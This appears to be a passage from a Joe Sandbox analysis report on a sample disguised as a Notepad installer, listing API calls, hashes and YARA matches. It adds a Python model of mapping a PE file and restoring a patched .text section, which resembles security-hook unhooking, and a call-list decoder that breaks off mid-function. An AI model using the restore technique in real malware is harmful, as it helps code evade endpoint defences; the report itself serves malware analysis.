                                        • Part of subcall function 006E8DA7: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 006E8DC6
                                        • Part of subcall function 006E8DA7: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006E8DE7
                                        • Part of subcall function 006E8DA7: GetFileSize.KERNEL32(00000000,00000000), ref: 006E8DFE
                                        • Part of subcall function 006E8DA7: malloc.MSVCRT ref: 006E8E08
                                        • Part of subcall function 006E8DA7: ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 006E8E23
                                        • Part of subcall function 006E8DA7: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006E8E57
                                        • Part of subcall function 006E8DA7: memcpy.NTDLL(00000000,00000000,00000000), ref: 006E8E69
                                        • Part of subcall function 006E8DA7: memcpy.NTDLL(?,?,?), ref: 006E8E8F
                                        • Part of subcall function 006E8DA7: ??3@YAXPAX@Z.MSVCRT ref: 006E8EA7
                                        • Part of subcall function 006E8DA7: FindCloseChangeNotification.KERNELBASE(00000000), ref: 006E8EB1
                                      • IsBadHugeReadPtr.KERNEL32(00000000,00000010), ref: 006E8FDB
                                      • IsBadHugeReadPtr.KERNEL32(?,00000010), ref: 006E8FEC
                                      • memcmp.NTDLL ref: 006E9002
                                        • Part of subcall function 006E9094: memcmp.NTDLL ref: 006E90B7
                                        • Part of subcall function 006E0300: LdrInitializeThunk.NTDLL(006E9043,?,?,00001000,00000040,00000000), ref: 006E030A
                                      • memcpy.NTDLL(?,00000000,?,?,?,00001000,00000040,00000000), ref: 006E904C
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,006E88E3,?,?), ref: 006E9089
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileReadmemcpy$HugeVirtualmemcmp$??3@AllocChangeCloseCreateCurrentEnvironmentExpandFindFreeHandleInitializeModuleNotificationProcessSizeStringsThunkmalloc
                                      • String ID:
                                      • API String ID: 3632012887-0
                                      • Opcode ID: b15105f1897efed8b6789a31e04324c60ddba4e5f8fb4386f432e4f5b3aa07a6
                                      • Instruction ID: 0283f1e2ec70babc01582658bfd1a73f56b5369271f643e9dbaa95a974327d25
                                      • Opcode Fuzzy Hash: b15105f1897efed8b6789a31e04324c60ddba4e5f8fb4386f432e4f5b3aa07a6
                                      • Instruction Fuzzy Hash: 2D414FB1901349AFDB209FA5CC81AEFBBBEEF44355F504469F905E2252EB30DA40CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%
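Taken together, the listing at 006E8DA7 (ExpandEnvironmentStringsW, CreateFileW with GENERIC_READ and OPEN_EXISTING, GetFileSize, malloc, ReadFile, a check against the string "MZ", VirtualAlloc with MEM_COMMIT and PAGE_READWRITE, one memcpy and then a memcpy loop) and its caller at 006E8F2D (GetModuleHandleW, IsBadHugeReadPtr, memcmp, memcpy, VirtualFree with MEM_RELEASE) have the shape of a file being laid out in memory like a loaded image and then compared against, and copied over, a module already loaded in the process. That reading is an inference from the call sequence, not something the report states. The Python below is an added model of that sequence, written for this page and not code from the sample: it builds a minimal PE32 (constructed test input), maps it the way the listing does, and implements the memcmp-then-memcpy restore step over one section.

```python
"""Runnable model of the file-to-image mapping listed at 006E8DA7 (open the file,
read it, check the "MZ" signature, allocate SizeOfImage, copy the headers, copy
each section) followed by the compare-and-overwrite step at 006E8F2D (memcmp,
then memcpy from the fresh copy).  Added example written for this page; it is
not code from the sample, and the tiny PE32 it builds is constructed test input."""
import struct

def build_sample_pe() -> bytes:
    """Construct a minimal PE32 with a .text and a .data section (test input)."""
    text = bytes(range(256)) * 2                       # 0x200 bytes at raw offset 0x200
    data = b"\xAA" * 0x200                             # 0x200 bytes at raw offset 0x400
    secs = [(b".text", 0x1000, len(text), 0x200, 0x60000020),   # name, RVA, size, raw ptr, flags
            (b".data", 0x2000, len(data), 0x400, 0xC0000040)]
    opt = bytearray(224)                               # IMAGE_OPTIONAL_HEADER32
    struct.pack_into("<H", opt, 0, 0x10B)              # Magic: PE32
    struct.pack_into("<I", opt, 16, 0x1000)            # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)          # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)    # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x3000, 0x200)    # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                # NumberOfRvaAndSizes
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, len(opt), 0x102)
    sec_tbl = b"".join(struct.pack("<8sIIIIIIHHI", n, sz, va, sz, ptr, 0, 0, 0, 0, ch)
                       for n, va, sz, ptr, ch in secs)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))        # e_lfanew -> "PE\0\0"
    headers = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + sec_tbl
    image = bytearray(0x600)
    image[:len(headers)] = headers
    image[0x200:0x400] = text
    image[0x400:0x600] = data
    return bytes(image)

def parse_pe(raw):
    """Return (SizeOfHeaders, SizeOfImage, [(name, rva, vsize, raw_ptr, raw_size)])."""
    if raw[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", raw, 0x3C)[0]
    if raw[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsec = struct.unpack_from("<H", raw, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", raw, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    size_of_image, size_of_headers = struct.unpack_from("<II", raw, opt + 56)
    sections = []
    for i in range(nsec):
        name, vsize, rva, raw_size, raw_ptr = struct.unpack_from("<8sIIII", raw, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(), rva, vsize, raw_ptr, raw_size))
    return size_of_headers, size_of_image, sections

def map_image(raw: bytes) -> bytearray:
    """Lay the file out as a loader would: headers at RVA 0, each section at its
    RVA, inside a zero-filled SizeOfImage buffer (the VirtualAlloc + memcpy step)."""
    size_of_headers, size_of_image, sections = parse_pe(raw)
    image = bytearray(size_of_image)
    hdr = raw[:size_of_headers]
    image[:len(hdr)] = hdr
    for _, rva, _, raw_ptr, raw_size in sections:
        chunk = raw[raw_ptr:raw_ptr + min(raw_size, size_of_image - rva)]  # never past the image
        image[rva:rva + len(chunk)] = chunk
    return image

def restore_section(live: bytearray, clean: bytearray, name: str = ".text") -> int:
    """memcmp then memcpy: compare one section of the live image with the freshly
    mapped copy and overwrite it from that copy.  Returns the number of bytes that
    differed (0 means the live section already matched the on-disk image)."""
    for sec_name, rva, vsize, _, raw_size in parse_pe(clean)[2]:
        if sec_name == name:
            end = rva + min(vsize, raw_size)
            changed = sum(1 for i in range(rva, end) if live[i] != clean[i])
            live[rva:end] = clean[rva:end]
            return changed
    raise KeyError(name)

if __name__ == "__main__":
    clean = map_image(build_sample_pe())
    live = bytearray(clean)
    live[0x1000:0x1005] = b"\xE9\xEB\xEB\xEB\xEB"      # simulate a 5-byte patch at the start of .text
    print("bytes restored:", restore_section(live, clean))   # 5
```

Run as a script, the module maps the constructed image, patches the first five bytes of .text in a copy, and restores them from the clean mapping. On a real file, map_image() produces the kind of clean copy a memcmp against a live module would be measured against, section by section; the page-size and protection handling that the LdrInitializeThunk call at 006E030A presumably deals with is outside what this model shows.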

                                      APIs
                                      • ioctlsocket.WS2_32(006F16C7,8004667E,006F1744), ref: 006F0508
                                      • WSAGetLastError.WS2_32(?,?,006F04B2,17E80870,006F16C7,00000000,00000010,00000000,?,?,?,006F043E,006F16C7,00000002,006F16C7,00000010), ref: 006F0513
                                      • CreateIoCompletionPort.KERNELBASE(006F16C7,19751710,006F16C7,00000000,?,?,006F04B2,17E80870,006F16C7,00000000,00000010,00000000,?,?,?,006F043E), ref: 006F0533
                                      • SetFileCompletionNotificationModes.KERNEL32(006F16C7,00000003,?,?,006F04B2,17E80870,006F16C7,00000000,00000010,00000000,?,?,?,006F043E,006F16C7), ref: 006F0575
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Completion$CreateErrorFileLastModesNotificationPortioctlsocket
                                      • String ID:
                                      • API String ID: 3397353003-0
                                      • Opcode ID: 1cfe454d1a47206ea8a4a9486267abd581268cae99c7f72eecb84a6fbeacaa99
                                      • Instruction ID: f8d9add7ea729d69d092dcd7341d67a53d14b9098c7139772cbca58bd4881eaf
                                      • Opcode Fuzzy Hash: 1cfe454d1a47206ea8a4a9486267abd581268cae99c7f72eecb84a6fbeacaa99
                                      • Instruction Fuzzy Hash: EC31B3B120420DABFB219F64DE45BBA37ABAF40354F144119FF1292292E7B0EE51CF61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenUser),00000000,00000000,00000000,00000000,00000000), ref: 006E4181
                                      • GetLastError.KERNEL32 ref: 006E4187
                                      • malloc.MSVCRT ref: 006E4196
                                      • memset.NTDLL ref: 006E41A8
                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenUser),00000000,00000000,00000000), ref: 006E41BD
                                      • LookupAccountSidW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000104,?), ref: 006E41F8
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E4202
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationToken$??3@AccountErrorLastLookupmallocmemset
                                      • String ID:
                                      • API String ID: 2392997092-0
                                      • Opcode ID: 98fb2c9b244bc893bdd9ef4204038d140f88c8f5cce1771f0a3ec66d3374b632
                                      • Instruction ID: e40386d5d536c16cb063752f6049cd4de32a8c3bea7b206c62910e991b2a9dad
                                      • Opcode Fuzzy Hash: 98fb2c9b244bc893bdd9ef4204038d140f88c8f5cce1771f0a3ec66d3374b632
                                      • Instruction Fuzzy Hash: CC210776801249FFDF118FA1DD85DEE7BBEEB14354F10006AFA0192110EB719EA0DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: callocmallocmemcpystrlen
                                      • String ID: $$File
                                      • API String ID: 2006192344-341256565
                                      • Opcode ID: 42f8bed387473e7dd1c6cca7877ee791c990ec01c844c79b214af29e6b9f13da
                                      • Instruction ID: 0094a8efc2f9d6dfe744c6bff33358b91be10389d17dd6afd692dc2d41184827
                                      • Opcode Fuzzy Hash: 42f8bed387473e7dd1c6cca7877ee791c990ec01c844c79b214af29e6b9f13da
                                      • Instruction Fuzzy Hash: 1D31F8B45047019FD710EF29C69461ABBE4FF45304F05887EE8899B386E778E844CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: __p__pgmptr$FileModuleName_strdup
                                      • String ID: "
                                      • API String ID: 2400198430-123907689
                                      • Opcode ID: 8a0e3ebc74ac171c18b8845260d1bc6e99df1b8d290b5f762ff71836290b3a3e
                                      • Instruction ID: dc95246e4bcf73894f1851f61b0e4e664c3af538d28cea9f3d6557adc83b0329
                                      • Opcode Fuzzy Hash: 8a0e3ebc74ac171c18b8845260d1bc6e99df1b8d290b5f762ff71836290b3a3e
                                      • Instruction Fuzzy Hash: CA719F71E093158BDB25CB18C84839AB7E1AF95308F1884BEC845A7381D739BD85CF9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: __p__pgmptr$FileModuleName_strdup
                                      • String ID: Z
                                      • API String ID: 2400198430-1505515367
                                      • Opcode ID: 586216d8618d879f17b543ef1cda0e27d17cdd33f7bcad6daa0321d54e411e6f
                                      • Instruction ID: 65554ac701d7e50c7a0dab7cab288e93c5d88a57e60c5c9fa36e589ed60e68f7
                                      • Opcode Fuzzy Hash: 586216d8618d879f17b543ef1cda0e27d17cdd33f7bcad6daa0321d54e411e6f
                                      • Instruction Fuzzy Hash: 0651A072E093158BDB24DF18C88479AB7E1BF91304F5580BEC948A7281D739BD85CF9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcessmemcpy
                                      • String ID:
                                      • API String ID: 4164033339-0
                                      • Opcode ID: f9355fd1d6cb5f3e9e3ccd460e7d80cdd41cf23e1272aedace0434c5151d0ab9
                                      • Instruction ID: 57dd651ea404dfa0c4e5e640fdbf5a5b3f1c24d7e19b008a0f3ec1f6c98b9393
                                      • Opcode Fuzzy Hash: f9355fd1d6cb5f3e9e3ccd460e7d80cdd41cf23e1272aedace0434c5151d0ab9
                                      • Instruction Fuzzy Hash: 2F31A2B05087029FD710EF29C58461EBBE4AF84348F41892EE8C8AB361EB78D945DB46
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: closesocket$shutdown
                                      • String ID: h9n
                                      • API String ID: 3079814495-487293551
                                      • Opcode ID: afd15894b49a43c192314b43fae093e56a7ed25035fecae8358accce5fbd8aca
                                      • Instruction ID: 78bd824f00240d2d7ec5326c28526ee066e48dfed5b3c2595f70419508900c21
                                      • Opcode Fuzzy Hash: afd15894b49a43c192314b43fae093e56a7ed25035fecae8358accce5fbd8aca
                                      • Instruction Fuzzy Hash: 0B412B71500B0ACFDB358F29C444BB6B7F2AB923A9F14961DDA928A691C334E846CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@mallocmemcpystrlen
                                      • String ID:
                                      • API String ID: 2100618974-0
                                      • Opcode ID: e25ca7f6b44be2508764e378cd1540d32f8921e841a785287acc862a48fdb544
                                      • Instruction ID: 0ae76ba510b3b09b6e63e8c2d76d0db5815f2da18d3fd2408d14366ffa2e9567
                                      • Opcode Fuzzy Hash: e25ca7f6b44be2508764e378cd1540d32f8921e841a785287acc862a48fdb544
                                      • Instruction Fuzzy Hash: 33416A71D0025AAFDB20CF6AD8905AEBBBAFF04350F248569E855E7241D334AE51CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: __p__pgmptr$FileModuleName_strdup
                                      • String ID:
                                      • API String ID: 2400198430-0
                                      • Opcode ID: 240b0d1e2ca166af3b9d631e2e48b326c87ccd1bddd120d57ad96e5237f0e7c2
                                      • Instruction ID: 2aebc01110d2851785a03ebda5ab5968bd10462250f2fe1a6ceca96ee5b5aa37
                                      • Opcode Fuzzy Hash: 240b0d1e2ca166af3b9d631e2e48b326c87ccd1bddd120d57ad96e5237f0e7c2
                                      • Instruction Fuzzy Hash: D2311A71D093158FDB20DF25C8453DAF7F1AB85314F15C4AED988A3241E7386A85CF96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: __p__pgmptr$FileModuleName_strdup
                                      • String ID:
                                      • API String ID: 2400198430-0
                                      • Opcode ID: 59d4162acc48f1005c4382b64dac0216b636a75d04a7b3129c4de15ac8a63ad7
                                      • Instruction ID: 6fd72f4b5ddff795ec0aed5361a17431d07769f91e5ce3c346ebaf1c4d7576e1
                                      • Opcode Fuzzy Hash: 59d4162acc48f1005c4382b64dac0216b636a75d04a7b3129c4de15ac8a63ad7
                                      • Instruction Fuzzy Hash: A9216971D093158FDB20DF24C8843DAB7F1AF85304F14C4AED988A3281E739AA85CF96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: __p__pgmptr$FileModuleName_strdup
                                      • String ID:
                                      • API String ID: 2400198430-0
                                      • Opcode ID: 9a153f24a2da6b53a8b2af1a0759da1aec0ff79c7c852294654ee214e4006ca0
                                      • Instruction ID: 161d899167e9a33e548d1e7e96ae793a37da8539009942bf9e761556852837fc
                                      • Opcode Fuzzy Hash: 9a153f24a2da6b53a8b2af1a0759da1aec0ff79c7c852294654ee214e4006ca0
                                      • Instruction Fuzzy Hash: 36215C72D083158FDB20DF24C84579AB7F0AB45304F1484AED988A3281E738A985CF96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WSARecv.WS2_32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 006F1004
                                      • WSAGetLastError.WS2_32 ref: 006F10B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastRecv
                                      • String ID: E'
                                      • API String ID: 904507345-3751625834
                                      • Opcode ID: 3c6ea7f7cf3a6b3f38be39c8da817c8d227e5a971bfc84c0eb8cbf07ab1f9e06
                                      • Instruction ID: 3dc845730622590f8ffe674ad75a42d644e7e3079c070d8d0d802d71128aca0c
                                      • Opcode Fuzzy Hash: 3c6ea7f7cf3a6b3f38be39c8da817c8d227e5a971bfc84c0eb8cbf07ab1f9e06
                                      • Instruction Fuzzy Hash: 0B817E70504708EFEB318F14C841AFA77B6EF063A4F00461EEF569A791D731EA868B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%
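
The call lists above (the FIONBIO ioctlsocket / CreateIoCompletionPort / SetFileCompletionNotificationModes setup, the GetTokenInformation / LookupAccountSidW pair, and the WSARecv / WSAGetLastError receive path) are easier to triage once the raw hex arguments are decoded. The following Python is an added example written for this page; it is not Joe Sandbox code and not code from the sample. It parses call lines in the report's "• Func.Module(args), ref: ADDR" format, decodes the ioctlsocket command code, the completion-notification flags and the TOKEN_INFORMATION_CLASS from their numeric values (1 is TokenUser; TokenIntegrityLevel is 25), and flags the two sequences. The sample input is copied from the lists above with the report's inline argument labels omitted, since the decoder derives them itself; the constant tables cover only what these calls need.

```python
"""Triage helper for Joe Sandbox 'APIs' call lists (added example, not part of the report)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: call lines copied from the APIs lists of this report, inline
# argument labels omitted (the decoder derives them from the numeric values).
SAMPLE = """\
• ioctlsocket.WS2_32(006F16C7,8004667E,006F1744), ref: 006F0508
• WSAGetLastError.WS2_32(?,?,006F04B2,17E80870,006F16C7,00000000,00000010,00000000,?,?,?,006F043E,006F16C7,00000002,006F16C7,00000010), ref: 006F0513
• CreateIoCompletionPort.KERNELBASE(006F16C7,19751710,006F16C7,00000000,?,?,006F04B2,17E80870,006F16C7,00000000,00000010,00000000,?,?,?,006F043E), ref: 006F0533
• SetFileCompletionNotificationModes.KERNEL32(006F16C7,00000003,?,?,006F04B2,17E80870,006F16C7,00000000,00000010,00000000,?,?,?,006F043E,006F16C7), ref: 006F0575
• GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 006E4181
• GetLastError.KERNEL32 ref: 006E4187
• LookupAccountSidW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000104,?), ref: 006E41F8
• WSARecv.WS2_32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 006F1004
"""

# One report line: "• Func.Module(arg,arg,...), ref: ADDR"; the argument list is optional.
CALL_RE = re.compile(
    r"^\s*•\s*(?P<func>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Winsock IOCTL encoding (winsock2.h): direction bits, 13-bit size, group letter, number.
IOC_IN, IOC_OUT = 0x80000000, 0x40000000
FIONBIO, FIONREAD, SIOCATMARK = 0x8004667E, 0x4004667F, 0x40047307
IOCTL_NAMES = {FIONBIO: "FIONBIO", FIONREAD: "FIONREAD", SIOCATMARK: "SIOCATMARK"}
# SetFileCompletionNotificationModes flags (winbase.h).
FCNM_FLAGS = {0x1: "FILE_SKIP_COMPLETION_PORT_ON_SUCCESS", 0x2: "FILE_SKIP_SET_EVENT_ON_HANDLE"}
# TOKEN_INFORMATION_CLASS values (winnt.h); only the ones worth recognising in triage.
TOKEN_CLASSES = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges", 4: "TokenOwner",
                 18: "TokenElevationType", 20: "TokenElevation", 25: "TokenIntegrityLevel"}


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[Optional[int]]   # None where the report printed '?'
    ref: int                    # address of the call site


def parse_args(raw: Optional[str]) -> List[Optional[int]]:
    if not raw:
        return []
    out = []
    for a in raw.split(","):
        a = re.sub(r"\(.*?\)", "", a).strip()     # drop any "(Label)" the report attached
        out.append(None if a in ("", "?") else int(a, 16))
    return out


def parse_calls(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            calls.append(ApiCall(m["func"], m["mod"], parse_args(m["args"]), int(m["ref"], 16)))
    return calls


def decode_ioctl(code: int) -> str:
    direction = "IOC_IN" if code & IOC_IN else "IOC_OUT" if code & IOC_OUT else "IOC_VOID"
    size, group, num = (code >> 16) & 0x1FFF, chr((code >> 8) & 0xFF), code & 0xFF
    return f"{IOCTL_NAMES.get(code, 'unknown')} ({direction}, group '{group}', number {num}, {size}-byte arg)"


def decode(call: ApiCall) -> str:
    """Human-readable note for the calls whose second argument carries the meaning."""
    arg = call.args[1] if len(call.args) > 1 else None
    if arg is None:
        return ""
    if call.func == "ioctlsocket":
        return decode_ioctl(arg)
    if call.func == "SetFileCompletionNotificationModes":
        return " | ".join(n for bit, n in FCNM_FLAGS.items() if arg & bit) or "0"
    if call.func == "GetTokenInformation":
        return TOKEN_CLASSES.get(arg, f"class {arg}")
    return ""


def find_patterns(calls: List[ApiCall]) -> List[str]:
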